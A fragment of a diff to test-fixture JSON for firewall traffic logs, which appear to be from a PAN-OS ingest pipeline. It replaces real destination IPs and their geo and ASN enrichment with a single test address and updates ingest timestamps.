"community_id": "1:MwQQDOUiYF37dHofLv1bDnJVK20=" } }, "sequence_number": 32091149, 
@@ -6213,8 +6277,8 @@ ], "network": { "community_id": [ - "1:SsNvr7qdck7W52PZqREypGPIglo=", - "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=" + "1:I02So92wktIGhyngyvODK1CjYE0=", + "1:MwQQDOUiYF37dHofLv1bDnJVK20=" ], "transport": "udp", "application": "dns", @@ -6254,14 +6318,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941921525Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031635500Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6284,30 +6348,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.194.41" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 2302, - "ip": "35.186.194.41", + "ip": "175.16.199.1", "packets": 20 }, "rule": { @@ -6326,7 +6389,7 @@ "packets": 24, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6341,7 +6404,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.194.41" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -6363,7 +6426,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:djhBHAw6H+Q9Bcz6i7V+GTrjtzA=" + "community_id": "1:5htp8jawo3huELq1UH1p4sEtjb0=" } }, "sequence_number": 32091150, @@ -6383,8 +6446,8 @@ ], "network": { "community_id": [ - "1:oy06sQtSbOzvWgK/dr7N5HKE5Ng=", - "1:djhBHAw6H+Q9Bcz6i7V+GTrjtzA=" + "1:23S1gp3CDXG+HkgVhd5LhRLuB4M=", + "1:5htp8jawo3huELq1UH1p4sEtjb0=" ], "transport": "tcp", "application": "ssl", @@ -6424,14 +6487,14 @@ ], "ip": [ "192.168.15.224", - "35.186.194.41", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941924959Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031640800Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6454,25 +6517,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.124.9" + "ip": "175.16.199.1" }, "geo": { "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Asia Pacific Region", + "region_name": "Jilin", "location": { - "lon": 105.0, - "lat": 35.0 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 6757, - "ip": "35.201.124.9", + "ip": "175.16.199.1", "packets": 41 }, "rule": { @@ -6491,7 +6558,7 @@ "packets": 63, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6506,7 +6573,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.124.9" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -6528,7 +6595,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hIY5A8O11VWtEfpYG2l5voTvbVQ=" + "community_id": "1:3Xj5Loungg41BtyuN39Aku/fPSU=" } }, "sequence_number": 32091151, 
@@ -6548,8 +6615,8 @@ ], "network": { "community_id": [ - "1:DBvAD0JZYsb+pmUJkhTQYOcLJls=", - "1:hIY5A8O11VWtEfpYG2l5voTvbVQ=" + "1:7/bzJjfMyNLtPtSPbZS7ngdb7jk=", + "1:3Xj5Loungg41BtyuN39Aku/fPSU=" ], "transport": "tcp", "application": "ssl", @@ -6589,14 +6656,14 @@ ], "ip": [ "192.168.15.224", - "35.201.124.9", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941928494Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031646300Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6619,30 +6686,29 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.131.237" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 9007, - "ip": "100.24.131.237", + "ip": "175.16.199.1", "packets": 15 }, "rule": { @@ -6661,7 +6727,7 @@ "packets": 17, "ip": "192.168.15.224" }, - "message": "192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6676,7 +6742,7 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.131.237" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -6698,7 +6764,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:sXYelUOdA/EfjcKKE8M5kPe+M+c=" + "community_id": "1:BqGtjnqaLBL0AheKdX6R+tA//pM=" } }, "sequence_number": 32091152, @@ -6718,8 +6784,8 @@ ], "network": { "community_id": [ - "1:3G8yDLybfwtFo10J4I/c5Ayd4Qk=", - "1:sXYelUOdA/EfjcKKE8M5kPe+M+c=" + "1:i5utgkRZlpe6WaogEGc0X/ygshg=", + "1:BqGtjnqaLBL0AheKdX6R+tA//pM=" ], "transport": "tcp", "application": "ssl", @@ -6759,14 +6825,14 @@ ], "ip": [ "192.168.15.224", - "100.24.131.237", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 6000000000, - "ingested": "2021-09-08T12:40:05.941932038Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031651600Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6789,27 +6855,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 661, - "ip": "184.51.252.247", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -6828,7 +6896,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6843,7 +6911,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -6865,7 +6933,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:D6pPzYoIWTOXxVzuweKvZYK6FVE=" + "community_id": "1:HXFnYo3f5YlpCoWc0M/Gph6UNR0=" } }, "sequence_number": 32091153, @@ -6885,8 +6953,8 @@ ], "network": { "community_id": [ - "1:ZTCXYP/obCmlK+BT3BISstdxpCk=", - "1:D6pPzYoIWTOXxVzuweKvZYK6FVE=" + "1:QMGyI9PNy+dGmC37Ys8l8Zj1+2Q=", + "1:HXFnYo3f5YlpCoWc0M/Gph6UNR0=" ], "transport": "tcp", "application": "ssl", @@ -6926,14 +6994,14 @@ ], "ip": [ "192.168.15.224", - "184.51.252.247", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 13000000000, - "ingested": "2021-09-08T12:40:05.941935544Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031657100Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6956,30 +7024,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.190.88.148" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 11136, - "ip": "35.190.88.148", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -6998,7 +7065,7 @@ "packets": 15, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7013,7 +7080,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.190.88.148" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
@@ -7035,7 +7102,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:VFQjrA+iaNcIu6vFJNU6ls7+4Is="
+ "community_id": "1:wIMtkc+omUcDuGtjtq8TvhqNq20="
 }
 },
 "sequence_number": 32091154,
@@ -7055,8 +7122,8 @@
 ],
 "network": {
 "community_id": [
- "1:DEAqTvDzZjanGG1P2CcnR3CKUfc=",
- "1:VFQjrA+iaNcIu6vFJNU6ls7+4Is="
+ "1:mrwNmKKDfyTNhQfx1zXczTdhcq4=",
+ "1:wIMtkc+omUcDuGtjtq8TvhqNq20="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -7096,14 +7163,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "35.190.88.148",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-09-08T12:40:05.941939060Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031662500Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7126,30 +7193,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "35.186.243.83"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Mountain View",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "California",
+ "region_name": "Jilin",
 "location": {
- "lon": -122.0748,
- "lat": 37.4043
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 11136,
- "ip": "35.186.243.83",
+ "ip": "175.16.199.1",
 "packets": 16
 },
 "rule": {
@@ -7168,7 +7234,7 @@
 "packets": 15,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -7183,7 +7249,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "35.186.243.83"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-fin",
@@ -7205,7 +7271,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:Xx31zYZNYc/mjf2GOihkp6JogmA="
+ "community_id": "1:aKnE6fn7Ig7HrfpXAhg+xQzAzYs="
 }
 },
 "sequence_number": 32091155,
@@ -7225,8 +7291,8 @@
 ],
 "network": {
 "community_id": [
- "1:t/ErTuEXtgYIkRnq4+UdhVKcFnA=",
- "1:Xx31zYZNYc/mjf2GOihkp6JogmA="
+ "1:ODdDi5QbXC7LNnDH90Jp+12oB0Q=",
+ "1:aKnE6fn7Ig7HrfpXAhg+xQzAzYs="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -7266,14 +7332,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "35.186.243.83",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-09-08T12:40:05.941942556Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031667800Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7296,27 +7362,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 182,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -7335,7 +7403,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -7350,7 +7418,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -7372,7 +7440,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:445AeHI1LAvb+ii4arRZeLAO4zM="
+ "community_id": "1:8KuHdx0uKJL3qlKce34DQ08Axak="
 }
 },
